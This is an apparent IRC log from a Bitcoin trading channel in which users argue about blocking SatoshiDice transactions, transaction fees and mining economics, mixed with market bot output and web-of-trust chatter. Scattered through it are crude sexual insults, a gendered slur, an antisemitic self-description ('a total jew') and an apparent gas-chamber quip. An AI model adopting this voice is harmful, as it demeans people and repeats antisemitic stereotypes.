financial transaction is abusing the communal agreement on what the blockchain is for Feb 04 23:23:35 dub its hopeless. Feb 04 23:23:35 gigavps: obviously Feb 04 23:23:45 Luke-Jr: please speak for yourself Feb 04 23:23:51 dub: under the scenario you described, a mining majority could produce a block that a different majority of bitcoin clients rejects and disagrees with Feb 04 23:23:58 kakobreklaa: yeah, I know this too, just cant help myself sometimes. Feb 04 23:24:09 davout: I did. Feb 04 23:24:11 "different majority" Feb 04 23:24:13 davout when you're poor your only practical avenue is to speak "for the community" Feb 04 23:24:13 Luke-Jr: who told you that bitcoin is money ? Feb 04 23:24:20 so... he's speaking for the community. Feb 04 23:24:24 it's all just numbers Feb 04 23:24:35 there's a difference between the majority of miners and the majority of bitcoin clients on the p2p network Feb 04 23:24:47 or do you think those are the same? Feb 04 23:24:48 davout: it's not about "one person is okay with using it for FOO", it's about "everyone using it is doing it for FOO" Feb 04 23:24:49 Luke-Jr: I was under the impression you put words in my mouth, i don't give a fuck about what goes into the blockchain, be it financial transactions or religious messages if you see what i mean Feb 04 23:24:50 (so is the universe, btw) Feb 04 23:24:57 I think every x blocks, there's some milestone achieved? Feb 04 23:25:03 davout: you're one person. Feb 04 23:25:12 Luke-Jr: so are you Feb 04 23:25:12 I don't see the problem with SD transactions. Feb 04 23:25:26 100% of Bitcoin users have agreed to financial transactions. There is no other such agreement in this context. Feb 04 23:25:37 Namworld simply put, the problem with sd transactions is that sd made 20k last month, in btc. that's 400k usd at going rates. Feb 04 23:25:44 amazingrando made 9k, of which he paid electricity. Feb 04 23:25:49 the rest of the miners did about the same Feb 04 23:25:53 they perceive this is unfair. Feb 04 23:26:00 it may be unfair, but it is what they signed up for. Feb 04 23:26:01 Namworld: they're abusing the blockchain for signalling Feb 04 23:26:11 higher level services always take the cream, commodified supports suck it. Feb 04 23:26:18 this is why it's better to make ipads than resistors. Feb 04 23:26:25 blockchain is free to use. For anything. Feb 04 23:26:44 this is a religious debate, stop it Feb 04 23:26:47 This is my opinion of how it should be. Feb 04 23:26:53 Luke-Jr, are you going to shed tears for us? Feb 04 23:27:01 kakobreklaa im working on it. Feb 04 23:27:20 I'm annoyed at SD too but market forces will prevail Feb 04 23:27:23 plus we don't need the whole blockchain history to do transactions, do we? Feb 04 23:27:35 (because its no longer possible to run a node on the hardware I was running it on) Feb 04 23:27:43 Namworld: the unanimous bitcoin community does not agree. Feb 04 23:27:50 so.. maybe someone can seriously clear something up for me.. when a block is validated by the rest of the bitcoin network.. that's done per bitcoin client on the p2p network, right? not scaled with that client's mining power in H/S Feb 04 23:27:50 ahaha sweet. Feb 04 23:27:54 where is this unanimous community ? Feb 04 23:28:03 Namworld: and yes, the entire blockchain history must be kept forever right now Feb 04 23:28:15 Yeah, but it could get modified Feb 04 23:28:24 iz> yes Feb 04 23:28:33 no srsly, where can i visit the unanimous community ? Feb 04 23:28:34 i'm not a fan of the 5GB blockchain Feb 04 23:28:38 that's just me Feb 04 23:28:39 Namworld: you have a genius idea on how? Feb 04 23:28:44 /ignore mircea_popescu Feb 04 23:28:48 jcpham kinda why the maxblocksize is there. Feb 04 23:28:48 iz: yes, you are wrong Feb 04 23:29:00 so.. if you have a majority of the hashing power, but not a majority of clients.. even if you were to change the bitcoin client rules, you couldn't get these new rules into the block chain Feb 04 23:29:07 even if you had a majority of the hashing power Feb 04 23:29:13 iz: no, you are wrong Feb 04 23:29:17 Luke-Jr stop arguing like a stupid cunt. you say something, stand by it. where is the motherfucking unanymous community! Feb 04 23:29:20 how would that work then, dub? Feb 04 23:29:26 no maxblocksize is not there to keep the size of the blockchain down, i thought it was there so blocks can be verified and propogated sanely Feb 04 23:29:26 iz: because bitcoin Feb 04 23:29:36 dub: iz is correct Feb 04 23:29:39 how would the old clients behave via the new rules? Feb 04 23:29:56 We could probably have a new "balance" block created every 10k blocks lets say, stating all balances per address, and work with 2 or 3 such balance blocks and cut the previous ones as we go on. Feb 04 23:30:12 there isn't "balances per address" Feb 04 23:30:28 ya, Namworld, that's not how this thing works. Feb 04 23:30:28 Namworld: and how will new nodes know to trust that? Feb 04 23:30:33 kakobreklaa: please direct further questions about why you are wrong towards luke or someone you might take more seriously than me Feb 04 23:30:39 Luke-Jr: longest blockchain Feb 04 23:30:41 [MPEX] [S.MPOE] 4829 @ 0.00069515 = 3.3569 BTC [-] Feb 04 23:30:42 what the hell are you babling about, you can mine offline for all we care Feb 04 23:30:43 the merkles. use the merkles Feb 04 23:30:51 awkorama: if you delete the history, they're all 1 block long Feb 04 23:30:59 Luke-Jr: until they are not Feb 04 23:31:12 it's shocking to see how little understood bitcoin is. Feb 04 23:31:37 mircea_popescu: compared to other currencies you mean ? Feb 04 23:31:45 i doubt anything actually shocks mircea_popescu Feb 04 23:31:47 heh... you have a point. Feb 04 23:31:48 BREAKING NEWS : BITCOIN IS NON-TRIVIAL TECHNOLOGY Feb 04 23:31:53 BOTH OF YOU OMG Feb 04 23:32:27 so what exactly is the dicussion Feb 04 23:32:27 shit. well... meanwhile satoshidice just died Feb 04 23:32:35 i've been reading for a few minutes and i get lost Feb 04 23:32:36 because rational miners haven't been including its transactions Feb 04 23:32:36 NO U Feb 04 23:32:56 what to do what to do... Feb 04 23:32:59 jcpham: were talking about how mircea_popescu's cock is bigger than davout's Feb 04 23:33:08 oh Feb 04 23:33:10 ohw is that rational? don't they get transaction fees ? Feb 04 23:33:10 davout doesn't have a cock, he's a girl. Feb 04 23:33:13 [MPEX] [S.MPOE] 5155 @ 0.00069157 = 3.565 BTC [-] Feb 04 23:33:15 [MPEX] [S.MPOE] 4321 @ 0.00069003 = 2.9816 BTC [-] Feb 04 23:33:17 [MPEX] [S.MPOE] 2674 @ 0.00069003 = 1.8451 BTC [-] Feb 04 23:33:20 awkorama they get their fees in heaven. Feb 04 23:33:22 mircea_popescu i think mtgox payes luke to include their txes Feb 04 23:33:37 girls cant have cocks too? Feb 04 23:33:39 kakobreklaa ya, i seem to recall this incident in octomber last year... Feb 04 23:33:48 We can probably have on those every 10k blocks balance block some hash of the previous blocks inserted, one for each. If someone cares to verify them, download the historical data and check those blocks Feb 04 23:33:50 dub they can have all the cocks they want Feb 04 23:33:50 THEY CAN IF THERE IS CONCESUS Feb 04 23:33:51 we just switched to random talk here Feb 04 23:33:55 i think pools and miners should have that option Feb 04 23:34:09 got could pay for priority txns Feb 04 23:34:12 *gox Feb 04 23:34:20 Diablo-D3: there? Feb 04 23:34:26 along with its total lenght Feb 04 23:34:31 Namworld: too.. pm :) Feb 04 23:34:33 i'm all for monetizing hashpower Feb 04 23:34:33 jcpham: they pay for feeless txns, or did Feb 04 23:34:45 The idea would be to assume that old data and lenght is accurate Feb 04 23:34:54 and verify them if you want to Feb 04 23:35:10 Namworld: there is no such thing as an address balance, you misunderstand the way transactions work Feb 04 23:35:10 but regular users could work on the short version Feb 04 23:35:24 I know there is no address balance currently Feb 04 23:35:36 it's not even "currently" Feb 04 23:35:58 what's a concesus ? Feb 04 23:35:59 damn where did the 99 users come from Feb 04 23:36:03 transactions have scripts, that may or may not be more complex than N addresses output to M addresses with an optional TX fee Feb 04 23:36:22 jcpham rational irc users. Feb 04 23:36:31 bitcoin is ruining freenode Feb 04 23:36:36 Namworld: this was already discussed back in 2010 Feb 04 23:36:39 :) Feb 04 23:36:49 awkorama: SD costs miners more than the fees cover Feb 04 23:37:02 awkorama: it also harms Bitcoin, reducing the value of them Feb 04 23:37:08 bitcoin is ruining freenode <<< it is a testament to bitcoin's state that this statement is true when everyone knows how fucking ruined freenode was to begin with. Feb 04 23:37:16 How does SD costs miners? Feb 04 23:37:23 lilo ruined freenode Feb 04 23:37:24 other than verifying the transactions? Feb 04 23:37:38 technically, SD is paying miners Feb 04 23:37:39 not costing them Feb 04 23:37:46 dude, srsly. stop with all the rationalization bullshit. just come out clean, say it. they make money , you'd like some, you think it's unfair etc. Feb 04 23:37:48 they are or were a large portion of txn fees being paidout Feb 04 23:37:51 "costs miners". Feb 04 23:38:07 Namworld: every single node relaying the block needs to verify the transactions before it sends it on, so block propagation time increases and blocks get orphaned Feb 04 23:38:23 and dub has to throw away hardware Feb 04 23:38:27 Ukyo: but those fees were never meant to cover the ACTUAL COSTS of mining the transaction Feb 04 23:38:30 and @davout: Ah well nevermind then. Just a random proposal, would require rewriting of how bitcoin network accepts transactions. Feb 04 23:38:40 Then raise the fees Feb 04 23:38:48 Ukyo: they're only there to DISCOURAGE spammers; which doesn't work for SD because it has an unlimited supply of idiot gamblers to cover the expense Feb 04 23:38:54 lmao Feb 04 23:38:56 thts not how I understand it Feb 04 23:38:58 THEY ARE NOT SPAMMERS Feb 04 23:39:06 txn fees are there to replace the BTC as its goes away Feb 04 23:39:12 Ukyo: yes, raising fees is the "obvious" solution Feb 04 23:39:14 or else when all coins are mined, no one will mine.. Feb 04 23:39:28 Ukyo: problem is, until Bitcoin reaches critical mass, raising fees will kill adoption Feb 04 23:39:28 raising fees will just mean other miners get it, end of story. Feb 04 23:39:50 what eats him, basically, is that pretty much no miner cares about what he thinks on the matter. Feb 04 23:39:54 i was being ironic Feb 04 23:39:56 can't SD just raise fees for their transactions? Feb 04 23:39:58 re: freenode Feb 04 23:40:27 iz: yes, miners would be forced to raise fees high enough that the gamblers stopped playing basically Feb 04 23:40:31 Luke-Jr: code a forl that doesn't relay sd txes, i'll use it, seriously. Feb 04 23:40:36 or SD stopped its DDoS Feb 04 23:40:43 davout: already done Feb 04 23:40:46 or better yet, have the fees influence the % of payout slightly Feb 04 23:40:52 or you got a job doing somethingelse ? Feb 04 23:40:54 thats stupid luke Feb 04 23:41:00 iz: SD can't control what fees their users pay, and the fees would have to be very high to negate the negative effect Feb 04 23:41:02 we are already at one half reward Feb 04 23:41:02 srsly luke. bitcoin isn't for you. Feb 04 23:41:05 txn fees should go up Feb 04 23:41:07 to account for that Feb 04 23:41:09 this is for smart people. why do you keep torturing yourself ? Feb 04 23:41:14 that was the whole original basis Feb 04 23:41:17 you can't cope, there's no rule every idiot under the sun has to be involved. Feb 04 23:41:22 pigeons: can't they just decide to reject any transactions that have a tx fee below X? Feb 04 23:41:25 Ukyo: the basis was that ADOPTION would bring MORE fees Feb 04 23:41:27 yeah fees have gone waaay down since the start Feb 04 23:41:28 Ukyo: not that fees would go up Feb 04 23:41:32 do what cablepair did, focus on delivering rental party equipment or something Feb 04 23:41:34 its been how long now Feb 04 23:41:39 (fees will go up too, but that's not the main method) Feb 04 23:41:39 and that basis has failed Feb 04 23:41:51 Ukyo: it hasn't. SD is just forcing it to fail Feb 04 23:41:58 3 years and were getting .1btc per Feb 04 23:42:01 all they have to do is reject transactions with tx fees below what they want the new min to be Feb 04 23:42:05 make them pay more Feb 04 23:42:06 and it will help Feb 04 23:42:21 and other mining pools could still use normal lower tx fee, right? Feb 04 23:42:22 most ppl dont care about a 0.001 txn fee Feb 04 23:42:24 hell Feb 04 23:42:32 most ppl pay 0.1 ~1btc on normal fees to other things Feb 04 23:42:46 its priority optional anyways Feb 04 23:42:47 Ukyo: low fees is currently a point driving bitcoin adoption Feb 04 23:42:49 that was the basiss to get ppl in Feb 04 23:42:55 i bet you nickles to dollars that increasing the fee would simply increase the % of tx belonging to sd. Feb 04 23:42:56 no its not Feb 04 23:42:59 has nothing to do with it Feb 04 23:43:04 Ukyo: if you want bitcoin to succeed, increasing fees at this point is not a real option Feb 04 23:43:05 bitcoin adoption is being driven by media Feb 04 23:43:09 i think part of the issue is that btc is deflationary and can be difficult for new users to get currency for Feb 04 23:43:21 no, actually... bitcoin adoption is being driven by satoshi dice and mpex, in that order. Feb 04 23:43:23 and its anoniminity, etc Feb 04 23:43:24 yeah i think this artificallhy low fee structure we currently have is unsustainable obviously Feb 04 23:43:28 mp : hush you Feb 04 23:43:30 all the blathering online a very vehehehehery distant third. Feb 04 23:43:33 well... tis the truth. Feb 04 23:43:37 :P Feb 04 23:43:38 Ukyo: Bitcoin isn't anonymous. Feb 04 23:43:41 so even though a 0.005 tx fee isn't that much in real currency, it can seem like a lot if you only have 0.1 BTC to your name Feb 04 23:43:48 tell that to the media Feb 04 23:43:50 which reports it as such Feb 04 23:43:58 ppl sign up daily Feb 04 23:44:00 thinking they are anon Feb 04 23:44:04 davout: anyhow, https://gitorious.org/~Luke-Jr/bitcoin/luke-jr-bitcoin/commits/block_dice Feb 04 23:44:05 getting to use bitcoins Feb 04 23:44:21 Luke-Jr: : thats rediculas Feb 04 23:44:30 your setting a president to encourage ppl to block address Feb 04 23:44:32 aghahahaha that's cute Feb 04 23:44:36 he even has code nobody uses! Feb 04 23:44:36 Ukyo: good Feb 04 23:44:50 Ukyo: that also helps bitcoin along Feb 04 23:45:09 well Luke-Jr somehow has a point, as a simple node i really have no interest in relaying SD txes Feb 04 23:45:14 luke: i thikn eleigus pool is hurting bitcoin Feb 04 23:45:17 Ukyo: this is surprising to you? He has destroyed entire chains by 51% them and blocking all transactions. Feb 04 23:45:19 Ukyo: then you're wrong Feb 04 23:45:20 i will ask all the other miners to block it Feb 04 23:45:30 and pools Feb 04 23:45:34 hey Feb 04 23:45:46 you get to push ideas however right/wrong they are Feb 04 23:45:48 I can do mine Feb 04 23:45:49 oh.. it's cuz of the relaying Feb 04 23:45:51 i get it Feb 04 23:45:51 i don't mean to say what other should do, but if i had an easy to way to not relay txes matching certain patterns i'd definitely do it Feb 04 23:45:55 Ukyo it's possibly hurting, but it's so tiny as to not really matter. Feb 04 23:46:00 Ukyo: well, I only push right ideas. Feb 04 23:46:07 it's a sort of bitcoin zoo really. Feb 04 23:46:14 right by YOU Feb 04 23:46:17 its your opinion Feb 04 23:46:26 Luke-Jr: one day you'll understand that "right" and "wrong" are just your imagination Feb 04 23:46:37 i mean, everyone else in here seems to be argueing aginst you Feb 04 23:46:38 Ukyo: to a degree. and miners have the freedom to ignore transactions by design. Feb 04 23:46:43 davout_: nonsense Feb 04 23:46:44 so obvously other ppl dont shre your opinion Feb 04 23:47:01 Ukyo: well, mostly because not many people here have a clue Feb 04 23:47:11 no Feb 04 23:47:13 and mircea_popescu chases off the people who do Feb 04 23:47:18 pp just dont agree that you need low fees to encourage ppl Feb 04 23:47:25 ahaha! dude. you came here because i'm here. Feb 04 23:47:36 mircea_popescu: : no, he lurks everywhere regardles Feb 04 23:47:37 and also, http://polimedia.us/dtng/c/src/136000991663.jpg Feb 04 23:47:39 sorry ego boy ;) Feb 04 23:47:50 Luke-Jr: sense, and non-sense are dividing stuff, it's like putting stuff in little boxes, right, wrong, good, bad, white, black small romanian cock, hard french rod, these are all imaginary Feb 04 23:48:02 Ukyo pfff. Feb 04 23:48:12 I'm even in #litecoin Feb 04 23:48:20 mp3* Feb 04 23:48:22 /j #rucoin Feb 04 23:48:28 so, Luke-Jr, when can i expect s.dice to be dead ? Feb 04 23:48:29 he lurks in my chans even hehe Feb 04 23:48:33 mircea_popescu: cute Feb 04 23:48:37 [MPEX] [S.MPOE] 10400 @ 0.00069038 = 7.18 BTC [+] Feb 04 23:48:39 [MPEX] [S.MPOE] 3300 @ 0.00069003 = 2.2771 BTC [-] Feb 04 23:49:37 actually Feb 04 23:49:41 raising the txn fees, will re-encourage miners Feb 04 23:49:44 more miners Feb 04 23:49:49 more mining sustainability Feb 04 23:49:58 increase more interest in ppl wanting to join bitcoin to mine Feb 04 23:50:00 and use it Feb 04 23:50:00 Ukyo not rly. the exchange rate is high atm, everyone's mining anyway Feb 04 23:50:07 Holy shit, you know how much crap I read to catch up Feb 04 23:50:11 and if blocks paid out higher Feb 04 23:50:12 due to txn fees Feb 04 23:50:17 jborkl lol welcome. Feb 04 23:50:18 Ukyo: mining is not the use case for bitcoin Feb 04 23:50:19 Luke, just buy sdice stock, Feb 04 23:50:20 even more ppl would jump Feb 04 23:50:26 Luke-Jr: if you want to be actually productive here is my advice : modify your fork so people can filter txes they wish to relay using arbitrary criteria, like regexp on the receiver address for example, make it consensual (that's probably where it's going to be hard for you) enough so it is accepted upstream Feb 04 23:50:30 for fucks sake Feb 04 23:50:33 dub: it maintains the network. its a small use case Feb 04 23:50:35 jborkl talk is cheaper than buyingstock. Feb 04 23:50:51 Ukyo: btw, to elaborate on the precedent-of-blocking-addresses bit… Bitcoin is only workable if every transaction uses a new address anyway, so discouraging reusable ones is a good thing Feb 04 23:51:09 I think txn fees should slowly increase over time, instead of "No more bitcoins generated. so BAM huge txn fee" Feb 04 23:51:10 davout: that'd make it slower :/ Feb 04 23:51:17 or you could put in a small txn fee at that time, and most miners wont care... Feb 04 23:51:18 davout: right now, I'm not even decoding the address Feb 04 23:51:19 Well I mine- and to make more income I bought sdice ---with blocks from mining Feb 04 23:51:25 Luke-Jr that's good sometimes. fixed addresses enhance anonimity and are good for branding purposes. Feb 04 23:51:28 so, it's a mixed bag. Feb 04 23:51:36 satoshi always said miners are supposed to decide which transactions to include in blocks Feb 04 23:51:44 Luke-Jr: well do, empower people to vote with their relay capability Feb 04 23:52:01 jborkl: I would advise selling it. Feb 04 23:52:18 because atm nodes are rewarded for their hashing power, but not for the relaying Feb 04 23:52:27 Luke-Jr wanna short it ? :D Feb 04 23:52:36 [MPEX] [S.MPOE] 4026 @ 0.00069003 = 2.7781 BTC [-] Feb 04 23:52:37 [MPEX] [S.MPOE] 5074 @ 0.00069003 = 3.5012 BTC [-] Feb 04 23:52:40 it's either going to evolve into "relay gets fees too", or "miners-only" IMHO Feb 04 23:52:41 No, thanks I will keep it Feb 04 23:52:55 davout relay isn't gonna get tx fee Feb 04 23:53:07 davout: I only bother with dice because it hurts me really. not sure I care enough to spend the time on your suggestion, though I'd encourage you to bring it up as a possibility in -dev sometime when more devs are around Feb 04 23:53:10 let's ask RealSolid what he thinks Feb 04 23:53:14 [MPEX] [O.BTCUSD.C200T] 2 @ 0.14735296 = 0.2947 BTC [+] Feb 04 23:53:16 [MPEX] [O.BTCUSD.C200T] 494 @ 0.12990002 = 64.1706 BTC [-] Feb 04 23:53:17 [MPEX] [O.BTCUSD.C190T] 1 @ 0.16454909 BTC [-] Feb 04 23:53:19 [MPEX] [O.BTCUSD.C190T] 496 @ 0.14947113 = 74.1377 BTC [-] Feb 04 23:53:20 [MPEX] [O.BTCUSD.C180T] 496 @ 0.17148704 = 85.0576 BTC [-] Feb 04 23:53:22 [MPEX] [O.BTCUSD.C170T] 490 @ 0.19578159 = 95.933 BTC [-] Feb 04 23:53:23 [MPEX] [O.BTCUSD.C160T] 2 @ 0.22221004 = 0.4444 BTC [-] Feb 04 23:53:25 okay Feb 04 23:53:27 davout: plus, I expect such a potentially-controversial change would go over easier if someone else did it Feb 04 23:53:29 now we are getting to it Feb 04 23:53:31 [BTCTC] [RSM] 100 @ 0.01 = 1 BTC [+] Feb 04 23:53:33 mircea_popescu: if not we're going to end up with a network made only of miners, and miners won't have an incentive to relay fee-paying txes to their neighbors Feb 04 23:53:34 your pool is suffering Feb 04 23:53:35 relaying is just the p2p part though, right? even non-mining clients relay transactions? Feb 04 23:53:41 or is that incorrect Feb 04 23:53:45 so your mad Feb 04 23:53:47 and its a personal issue Feb 04 23:53:51 Ukyo doh Feb 04 23:53:52 Ukyo: was. until I blcoked dice. Feb 04 23:53:56 Luke-Jr: code it and I'll submit it Feb 04 23:54:04 then your done, let it be Feb 04 23:54:09 moving on to a new subject Feb 04 23:54:09 avalons Feb 04 23:54:11 are still available Feb 04 23:54:12 davout: like I said, not really sure it's worth my time :P Feb 04 23:54:16 and will be relaunched soon Feb 04 23:54:24 davout: most big miners and pools can compile.. :P Feb 04 23:54:24 there are a great many orders that were placd Feb 04 23:54:27 and not paid for Feb 04 23:54:28 [MPEX] [S.MPOE] 2437 @ 0.00069003 = 1.6816 BTC [-] Feb 04 23:54:29 [MPEX] [S.MPOE] 11211 @ 0.00069002 = 7.7358 BTC [-] Feb 04 23:54:33 and those qty's will become available soon Feb 04 23:54:47 Luke-Jr: put your time where your mouth is Feb 04 23:54:49 [MPEX] [O.BTCUSD.P200T] 30 @ 0.16714568 = 5.0144 BTC [+] Feb 04 23:54:50 [MPEX] [O.BTCUSD.P200T] 970 @ 0.1706684 = 165.5483 BTC [+] Feb 04 23:55:07 while we're on asshattery: https://bitcointalk.org/index.php?topic=141163.0;topicseen Feb 04 23:55:07 and will be relaunched soon << that clusterfuck,... Feb 04 23:55:22 anyway, the cock measurment contest is waiting for contenders after the flawless french victory over romania Feb 04 23:55:40 pigeons: best to just ignore trolls Feb 04 23:55:47 davout im sorry, i must have missed that over the sound of you slurping it ?! Feb 04 23:56:22 hah Feb 04 23:56:43 visual aids : http://polimedia.us/dtng/c/src/135153836785.jpg Feb 04 23:56:45 she's french. Feb 04 23:56:53 of course teh french word for victory is surrender, right? Feb 04 23:56:59 hahaah Feb 04 23:57:03 mircea_popescu: if one day we ever physically meet i will insist on an actual penile measurment being performed by a local official Feb 04 23:57:15 as long as its a female official Feb 04 23:57:20 [HAVELOCK] [SDICE] 9 @ 0.75815152 = 6.8234 BTC [-] Feb 04 23:58:20 [HAVELOCK] [SDICE] 2 @ 0.76450001 = 1.529 BTC [+] Feb 04 23:58:20 [HAVELOCK] [SDICE] 8 @ 0.76450001 = 6.116 BTC [+] Feb 04 23:58:29 i'm not willing to purchase mining hardware with bitcoin Feb 04 23:59:04 why not ? you too could be making pennies to the dollar over high risk capital costs! Feb 04 23:59:20 [MPEX] [S.MPOE] 4321 @ 0.00069496 = 3.0029 BTC [+] Feb 04 23:59:22 [MPEX] [S.MPOE] 5579 @ 0.00069515 = 3.8782 BTC [+] Feb 04 23:59:32 i'm certainly not paying for mining equipment that actually exists already Feb 04 23:59:56 jcpham: I'll swap my bfl preorder for your mom Feb 05 00:00:07 i had basic units on preorder and paid with cc Feb 05 00:00:19 that fell apart. i called my cc company and got my money back Feb 05 00:00:23 rinse and repeat Feb 05 00:00:35 I iwsh i could have used a CC for my BFL pre order Feb 05 00:00:58 they took pp no? Feb 05 00:01:01 oh well - it saved some of my BTC from going down with the pirate's ship Feb 05 00:01:17 paypla is the same as credit card to me Feb 05 00:01:18 they still take pp Feb 05 00:01:19 [HAVELOCK] [SDICE] 9 @ 0.76450001 = 6.8805 BTC [+] Feb 05 00:01:28 dub: yeah - forgot about payPAL Feb 05 00:01:52 :/ Feb 05 00:02:17 avalon's unit looks nice. if they let me pay with another method other than btc only, i'd order one Feb 05 00:03:30 why not otc some btc with your cc via pp Feb 05 00:03:45 dub that could be in a meme. Feb 05 00:03:52 I thought so Feb 05 00:03:53 heh Feb 05 00:04:06 dub i do that anyways Feb 05 00:04:16 so whats the ploblem Feb 05 00:04:19 why would i then spend the coins on something i may never see Feb 05 00:04:29 dub, that owuld be impossible if you have no Wot Rating, right? Feb 05 00:04:30 oh u trollin' Feb 05 00:04:34 i know what happens when you send bitcoins Feb 05 00:04:35 jcpham you wouldn't spend coins on cavity fillings ? Feb 05 00:04:40 DeadWeasel: yes, in all likelyhood Feb 05 00:04:42 you never see them again Feb 05 00:04:53 DeadWeasel: jcpham is WoT jesus though Feb 05 00:05:01 [MPEX] [S.MPOE] 3692 @ 0.00069515 = 2.5665 BTC [+] Feb 05 00:05:11 haha Feb 05 00:05:31 I set it up last week, now I'm like, wtf do I with this since nobody will do business w/me. Feb 05 00:05:33 chicken and the egg Feb 05 00:05:34 ;getrating jcpham Feb 05 00:05:41 broken ass bot Feb 05 00:06:14 yeah DeadWeasel I have no tips for you there. it takes time. Feb 05 00:06:47 what kind of transactions would people consider? like tiny little ones? for what? where? Feb 05 00:07:10 well, do you have a cc DeadWeasel ? Feb 05 00:07:13 just linger on bitcoin-otc begging? sounds pathetic and not worth the time Feb 05 00:07:15 yeah Feb 05 00:07:25 aite, one sec Feb 05 00:07:46 i trade however seems most profitable to me Feb 05 00:07:58 i'm a total jew Feb 05 00:08:12 DeadWeasel https://secure.somethingawful.com/products/gift-certificate.php?product_type=register Feb 05 00:08:16 buy me that. ill send you .5 btc. Feb 05 00:08:32 i'll buy your coins with paypal -10% and sell them to someone else for cash +25% Feb 05 00:08:54 [MPEX] [S.MPOE] 8158 @ 0.00069943 = 5.7059 BTC [+] Feb 05 00:08:56 [MPEX] [S.MPOE] 4321 @ 0.00069018 = 2.9823 BTC [-] Feb 05 00:08:59 [MPEX] [S.MPOE] 4521 @ 0.00069002 = 3.1196 BTC [-] Feb 05 00:09:14 good idea, I could do localbitcoins.com for some Wot maybe? Feb 05 00:09:21 except they wouldn't be members Feb 05 00:09:24 ... Feb 05 00:09:36 this closed loop system. Feb 05 00:09:45 i'm looking at it, mp. Feb 05 00:10:12 don't facilitate MP getting onto somethingawful Feb 05 00:10:18 worst idea ever Feb 05 00:10:36 jcpham i am literally going to make a iama ama thread Feb 05 00:10:47 apparently I've gotta whore myself out to get my first Wot Rating. Feb 05 00:10:56 I'm a romanian porn king: ama Feb 05 00:11:09 ;;rate DeadWeasel 1 apparently I've gotta whore myself out to get my first Wot Rating. Feb 05 00:11:11 Rating entry successful. Your rating of 1 for user DeadWeasel has been recorded. Feb 05 00:11:36 dude i was gonna pop his wottery over a sa account Feb 05 00:11:38 OMG! you busted my WoT Cherry! Feb 05 00:11:40 thanks man Feb 05 00:11:41 it'd have been so beautiful Feb 05 00:11:50 it means a lot or little Feb 05 00:11:55 wottery, nice. Feb 05 00:11:56 you decide Feb 05 00:12:06 I plan on it. Feb 05 00:12:10 very little, jcpham is a POOR JUDGE of character Feb 05 00:12:11 everyone knows Feb 05 00:12:18 haha Feb 05 00:12:26 facepalm Feb 05 00:12:28 lol Feb 05 00:12:39 so, I missed the main conversation- how does jr think he is killing sd? Feb 05 00:12:45 j1717 jarpiain jborkl jcpham JohnGalt1337 jurov JWU42 JWU_42 Feb 05 00:12:48 bruce wagner got my bitcoins Feb 05 00:12:49 jborkl power of prayer. Feb 05 00:12:51 haha Feb 05 00:12:54 lol Feb 05 00:13:07 thing is i kinda like the fucker Feb 05 00:13:12 I prayed to the easter bunny and the shit came true Feb 05 00:13:14 but he gets too wrapped up ocasionally. Feb 05 00:14:51 [MPEX] [S.MPOE] 6450 @ 0.00069002 = 4.4506 BTC [-] Feb 05 00:15:53 ssh pe41 Feb 05 00:15:58 jesus fuck Feb 05 00:16:09 lmao Feb 05 00:16:11 all ur box Feb 05 00:16:52 IRC + audio meeting + maintenance window, my scheduler is contended Feb 05 00:16:56 ;;eauth mircea_popescu Feb 05 00:16:56 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Feb 05 00:17:37 ;;everify freenode:#bitcoin-otc:527a1a6410a9742789ec8c9a554290ef8f777431b94d35f8e170f52a Feb 05 00:17:38 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Feb 05 00:21:24 ;;eauth DeadWeasel Feb 05 00:21:25 Request successful for user DeadWeasel, hostmask DeadWeasel!~DeadWease@cpe-74-75-235-219.maine.res.rr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/6D206C24463BEC07 Feb 05 00:23:59 ;;rate DeadWeasel 1 Bought me SA account. Feb 05 00:24:01 Rating entry successful. Your rating of 1 for user DeadWeasel has been recorded. Feb 05 00:24:17 ;;unrate DeadWeasel Feb 05 00:24:18 Successfully removed your rating for DeadWeasel. Feb 05 00:24:22 aw shit Feb 05 00:24:29 probably best to not get him mixed up with me Feb 05 00:25:14 you don't wanna get mixed up with a guy like me Dottie Feb 05 00:25:23 I'm a loner Dottie, a rebel Feb 05 00:28:19 [HAVELOCK] [SDICE] 1 @ 0.76450001 BTC [+] Feb 05 00:29:36 lol Feb 05 00:30:07 omg discussion... if they're gonna blosk sdice, i'm proposing to block silk road too Feb 05 00:30:14 and mpex Feb 05 00:30:16 and gox Feb 05 00:30:23 ya Feb 05 00:30:37 in fact Feb 05 00:30:43 everything that is not end user Feb 05 00:30:46 oooh i want to block silk road Feb 05 00:30:48 should be banned! Feb 05 00:30:52 ll i dont accept any inputs without a government tax stamp Feb 05 00:31:35 so no btc donations for the church, Luke-Jr! Feb 05 00:31:43 it'd be nice if we could just convince erik to stop being a dick Feb 05 00:32:41 its a collective stabbing, cant outlaw the knife. Feb 05 00:32:42 http://forums.somethingawful.com/showthread.php?threadid=3532233 Feb 05 00:32:43 what's the name of the dice game that tries to be less destructive to the network? Feb 05 00:32:43 all he's doing is giving luke a reason to be luke Feb 05 00:32:47 i need it for ma bread. Feb 05 00:32:47 dude im like so cool now. Feb 05 00:32:58 fkn goons Feb 05 00:33:08 .title Feb 05 00:33:19 !title Feb 05 00:33:28 @title Feb 05 00:34:09 lovely, mp, everybody is your whore, no? Feb 05 00:36:19 [HAVELOCK] [SDICE] 1 @ 0.755 BTC [-] Feb 05 00:37:10 [MPEX] [S.MPOE] 4321 @ 0.00069992 = 3.0244 BTC [+] Feb 05 00:37:12 [MPEX] [S.MPOE] 321 @ 0.00069998 = 0.2247 BTC [+] Feb 05 00:39:42 I am Mircea Popescu! ask me anything! Q: Who are you? Feb 05 00:43:22 jurov: glad to block silk road, if you know a way Feb 05 00:43:55 orly? and what if sdice starts using another addy for every bet? Feb 05 00:45:02 just forget it. it's uphill battle. Feb 05 00:45:25 My god... Feb 05 00:45:47 hmm, lets make the anti-govt free to do thinkers -not be able to do what they want. No SD, no SR, no Porn ... whats left for bitcoin Feb 05 00:46:00 I bet they do the same thing for just about everything else... so many empty words Feb 05 00:46:04 aww mp your thread got pwned Feb 05 00:46:15 a well, i guess they banned it. Feb 05 00:46:18 SA must be happy from the advertising revenue tho. Feb 05 00:46:18 was fun while it lasted. Feb 05 00:46:38 its just moved Feb 05 00:46:54 http://forums.somethingawful.com/forumdisplay.php?forumid=25 Feb 05 00:46:56 but i can't post ? Feb 05 00:47:04 oh Feb 05 00:47:20 it's the gas chamber Feb 05 00:47:39 